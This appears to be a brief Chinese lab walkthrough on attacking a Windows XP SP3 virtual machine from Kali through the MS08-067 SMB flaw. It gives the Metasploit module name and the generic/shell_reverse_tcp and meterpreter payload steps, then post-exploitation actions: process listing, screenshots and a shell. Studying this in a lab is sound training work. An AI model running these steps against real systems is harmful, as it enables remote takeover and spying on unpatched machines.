MS08_067远程漏洞攻击:shell
实现攻击的前提是:攻击机和靶机在同一个网段下,首先将kali的ip改为与winxp的ip一样,二者能ping通
两台虚拟机:
kali ip:192.168.10.129
windows xp sp3:192.168.10.128
-
1.kali打开msfconsole控制台
-
2.在msf模式下查找ms08_067的漏洞攻击程序
-
3."use exploit/windows/smb/ms08_067_netapi"进入该漏洞模块
-
4."show payload"显示有效的攻击载荷,可以自选,以下使用generic/shell_reverse_tcp。
-
5."show targets"查看可以被攻击的靶机的操作系统型号
-
6.设置攻击有效载荷:set payload generic/shell_reverse_tcp
-
7.“show options“查看需要需要设置的数据
-
8.设置主机和靶机的ip和端口为下图所示
-
9.exploit开始攻击
-
10.获取靶机shell进行操作,与靶机本机操作结果一样
MS08_067远程漏洞攻击:meterpreter
-
1.基础设置如以上步骤一样,设置攻击载荷时改为使用meterpreter
-
2.运行exploit进行攻击
-
3.”ifconfig“查看靶机地址
-
4.“ps”查看进程
-
5.对靶机进行截屏
-
6.使用shell